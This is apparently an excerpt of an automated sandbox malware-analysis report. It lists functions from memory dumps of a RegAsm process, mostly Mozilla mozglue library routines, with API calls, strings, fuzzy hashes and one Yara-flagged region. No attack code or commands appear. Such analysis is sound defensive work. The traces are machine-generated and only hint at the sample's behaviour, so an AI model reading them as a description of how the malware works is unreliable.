Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 3316f1c2937719bddd9b616c7c26a34cea06d3ee43fa049af418155c23c81700
Instruction ID: d6ccf81f876a1ffac9ae214b2dcbd9943d41c1d97823e884463376ddec10cf22
Opcode Fuzzy Hash: 3316f1c2937719bddd9b616c7c26a34cea06d3ee43fa049af418155c23c81700
Instruction Fuzzy Hash: 1E014C74605381CBEF10DF29ED48A5873B4F70A315F2346A9E901C3A82EBB4A801CE59

Function 6C55F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F561

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

GetCurrentThreadId.KERNEL32 ref: 6C55F577
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F585
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C55F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C55F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C55F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C55F3A8

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 359f9fb4a0284e185dd6c04d60779c196d4f388a5418a5b23aa4ad6abbde7b2a
Instruction ID: d0c777d62fae56a806ff709ad2c736a19a1be67919604bd9c1a964473ca9f6c6
Opcode Fuzzy Hash: 359f9fb4a0284e185dd6c04d60779c196d4f388a5418a5b23aa4ad6abbde7b2a
Instruction Fuzzy Hash: 20F0B475200284DBEA10BF649C48A6A77BDFBC629DF030192FA0A83702DB355C01C769

Function 6C520E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C520DF8), ref: 6C520E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C520EA1
__Init_thread_footer.LIBCMT ref: 6C520EB5
FreeLibrary.KERNEL32 ref: 6C520EC5

Strings

kernel32.dll, xrefs: 6C520E7D
GetProcessMitigationPolicy, xrefs: 6C520E9B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 85fb32b076433d9a9e20d2e3c795e0732027d9c5a2fb7cfc75c2c0bd99d2786a
Instruction ID: 3dff539ce78c252b1e1a742fdbbe51873317933512849a505548fb844450c489
Opcode Fuzzy Hash: 85fb32b076433d9a9e20d2e3c795e0732027d9c5a2fb7cfc75c2c0bd99d2786a
Instruction Fuzzy Hash: 5C01FB747052C1DBEF109FA8DD64A4637F5F787315F1307AAE90182B80D778A8588A99

Function 6C55F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C55F598), ref: 6C55F621

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

GetCurrentThreadId.KERNEL32 ref: 6C55F637
AcquireSRWLockExclusive.KERNEL32(6C59F4B8,?,?,00000000,?,6C55F598), ref: 6C55F645
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8,?,?,00000000,?,6C55F598), ref: 6C55F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C55F62A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 30348bf583fe5d0808f12412a28443d6bb540a6a24cb790ca673c30d57837c0d
Instruction ID: d6598f7bd7eb8678cefcac62edc3eec36fa5085140f8c84cd9bae41221645b5d
Opcode Fuzzy Hash: 30348bf583fe5d0808f12412a28443d6bb540a6a24cb790ca673c30d57837c0d
Instruction Fuzzy Hash: F1F0B475200280EBEA107F648C48A6A777DFBC629DF430192FA0A83741CB365C01C769

Function 6C5505F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C54CFAE,?,?,?,6C5131A7), ref: 6C5505FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C54CFAE,?,?,?,6C5131A7), ref: 6C550616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5131A7), ref: 6C55061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5131A7), ref: 6C550627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C55061B, 6C550625
<jemalloc>, xrefs: 6C5505FA, 6C55060F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 25bb1ba9ffe1b33db112e9905aed077977e90b050b52903d6bc7c0bf4fc0b8f8
Instruction ID: 897f9d50326c2c2e93fe3cb9d1b0c3822b0cdc56ee780586515606ed4732b7a8
Opcode Fuzzy Hash: 25bb1ba9ffe1b33db112e9905aed077977e90b050b52903d6bc7c0bf4fc0b8f8
Instruction Fuzzy Hash: BEE08CE2A0202037F514226ABC86DBB761CDBC6134F090139FE0D82301EA4ABD1A51F6

Function 6C569240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C569BAE
free.MOZGLUE(?,?), ref: 6C569BC3
free.MOZGLUE(?,?), ref: 6C569BD9

Part of subcall function 6C5693B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5694C8
Part of subcall function 6C5693B0: free.MOZGLUE(6C569281,?), ref: 6C5694DD

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 6c9a18790f10639920cf90373639cd740795ef6aa02868114ebd1c7dfa4b07a2
Instruction ID: f5c157aa7f6a0c52b3b977f72d2e337613ddd15d31a233837db649fdbf0e48c3
Opcode Fuzzy Hash: 6c9a18790f10639920cf90373639cd740795ef6aa02868114ebd1c7dfa4b07a2
Instruction Fuzzy Hash: D4B1B071A047058BCB01CF69C88059FF3F5BFC9328B548629E8599BB60EB30E946CB91

Function 6C5205F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c956fd86fc9f13789b4f51cc400799790fdbed0301676da5cc9df25b782d31a2
Instruction ID: 76236e3a190edb72f6326ef148bfd4b02850995b062045e5aad3122ec6e764f4
Opcode Fuzzy Hash: c956fd86fc9f13789b4f51cc400799790fdbed0301676da5cc9df25b782d31a2
Instruction Fuzzy Hash: 20A15970A01645CFDB24CF29C994A9AFBF1FF88304F5586AED48A97B40E734A945CF90

Function 6C5571A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C556060: moz_xmalloc.MOZGLUE(00000024,D918E517,00000000,?,00000000,?,?,6C555FCB,6C5579A3), ref: 6C556078

free.MOZGLUE(-00000001), ref: 6C5572F6
free.MOZGLUE(?), ref: 6C557311

Strings

Copied unique strings, xrefs: 6C557320
Spliced unique strings, xrefs: 6C557340
333s, xrefs: 6C557226
333s, xrefs: 6C55731B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: 2fe36edea83d2972424c5b85db22adb4012678999232f9391b30fdd40927474a
Instruction ID: 8c4c0480c50ee3a4fcafc5fd2bf2c1fded0fcc1729610510c5e9e232fb004e59
Opcode Fuzzy Hash: 2fe36edea83d2972424c5b85db22adb4012678999232f9391b30fdd40927474a
Instruction Fuzzy Hash: 7E718371F106158FDB18CE69CC9069EB7F2AF84354F65C12AD809AB750EB31AD56CB80

Function 6C5714A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5714C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5714E2
GetCurrentThreadId.KERNEL32 ref: 6C571546
InitializeConditionVariable.KERNEL32(?), ref: 6C5715BA
free.MOZGLUE(?), ref: 6C5716B4

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 85ea56f8c53a03026c87233bafbf5792b36490382de109a2c08570a259ec0417
Instruction ID: 393904545538a82dc3cf54e91d87aaa25256700d5c41e2cf28c5643dd7639c44
Opcode Fuzzy Hash: 85ea56f8c53a03026c87233bafbf5792b36490382de109a2c08570a259ec0417
Instruction Fuzzy Hash: 1861DC71A00750DBDB218F21CC90B9EB7B5BF89308F45961DE98A57611EB30E988CBA1

Function 6C56C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C56C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C56C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C56C29E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: 8315dd9c7e33d6c85a34fe3bb2ca85737399f10e2c05de3e1d2cc51f68d3fa01
Instruction ID: 86726f55724b9b0d09b8a2ef1692dda5c525079baa9d420b4157cfda80c0af55
Opcode Fuzzy Hash: 8315dd9c7e33d6c85a34fe3bb2ca85737399f10e2c05de3e1d2cc51f68d3fa01
Instruction Fuzzy Hash: 76619B71A00618CFCF24DFA9DC849AEBBB5FF49314F154669E842A7B60D731B944CBA0

Function 6C569F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C569FDB
free.MOZGLUE(?,?), ref: 6C569FF0
free.MOZGLUE(?,?), ref: 6C56A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C56A0BE
free.MOZGLUE(?,?), ref: 6C56A0D5
free.MOZGLUE(?,?), ref: 6C56A0EB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 68932633808210e20974248c4723cc988c5145835dd85d4617831172ec6afc34
Instruction ID: dadbd89fecd6947a1f03cbcdf6964ec571a2a4ff204a18f6116388e31f3e2b1a
Opcode Fuzzy Hash: 68932633808210e20974248c4723cc988c5145835dd85d4617831172ec6afc34
Instruction Fuzzy Hash: C761DF75408611DFC711CF19C88059AB3F5FFC8328F509659E8999BB12EB32E986CBC1

Function 00413259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
StrCmpCA.SHLWAPI(00000000,004367D8), ref: 004132B1
strtok_s.MSVCRT ref: 00413371

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: 264f35a48c595a1dd1d23ce806c08b0664bc3f9f1fea006674d365e83df1677c
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 6C56DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C56DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C56D38A,?), ref: 6C56DC6F
free.MOZGLUE(?,?,?,?,?,6C56D38A,?), ref: 6C56DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C56D38A,?), ref: 6C56DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C56D38A,?), ref: 6C56DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C56D38A,?), ref: 6C56DD4A

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 54595b9257dcd888ab51091f3dc8f49a21c21d46877e679d2a21691734ef6546
Instruction ID: f3a6d6d6b339d1c65660e98ccbf5491a9230085bdfb0d29148b4cff263f863fe
Opcode Fuzzy Hash: 54595b9257dcd888ab51091f3dc8f49a21c21d46877e679d2a21691734ef6546
Instruction Fuzzy Hash: D0418F75A00619CFDB00DF9ACC8099AB7F5FF89318B664969D945A7B20D731FC00CB90

Function 6C5139A0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C59E744,ewWl,00000000,ewWl,?,6C536112), ref: 6C5139AF
LeaveCriticalSection.KERNEL32(6C59E744,?,6C536112), ref: 6C513A34
EnterCriticalSection.KERNEL32(6C59E784,6C536112), ref: 6C513A4B
LeaveCriticalSection.KERNEL32(6C59E784), ref: 6C513A5F

Strings

\Yl, xrefs: 6C513A02
ewWl, xrefs: 6C5139A3, 6C5139A5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: \Yl$ewWl
API String ID: 3168844106-342233420
Opcode ID: 4ce1ab4d0b8d6ea6875f3d3eda2cc56e049302b255f5458e2d4b193d81604314
Instruction ID: f2aed7e7830dc51d8c37411e5944773f1146a3c25789055450e8adece3b955a0
Opcode Fuzzy Hash: 4ce1ab4d0b8d6ea6875f3d3eda2cc56e049302b255f5458e2d4b193d81604314
Instruction Fuzzy Hash: F02135323096818FDB149F66CC69A2A73F5FB82714B260AA9D46583F40DB70AC05C7C6

Function 6C55CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C55CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C55CA69
Sleep.KERNEL32 ref: 6C55CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C55CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C55CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C55CB19

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: 28bd1aee17510f7ac5094440cb6e8ba4ca221d9de1e85d92810c8ef3df95d56a
Instruction ID: 337b2260282b64a7145182f09e36fb81c449d0d0118d677391e9c06576fe46a7
Opcode Fuzzy Hash: 28bd1aee17510f7ac5094440cb6e8ba4ca221d9de1e85d92810c8ef3df95d56a
Instruction Fuzzy Hash: 63213731B04648C7C709EF38CC4556FBBB9FFCA345F809A2AE849A6580FF7099588781

Function 6C56C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C56C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C56C842

Part of subcall function 6C56CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C58B5EB,00000000), ref: 6C56CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C56C863
std::_Facet_Register.LIBCPMT ref: 6C56C875

Part of subcall function 6C54B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C58B636,?), ref: 6C54B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C56C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C56C8BC

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
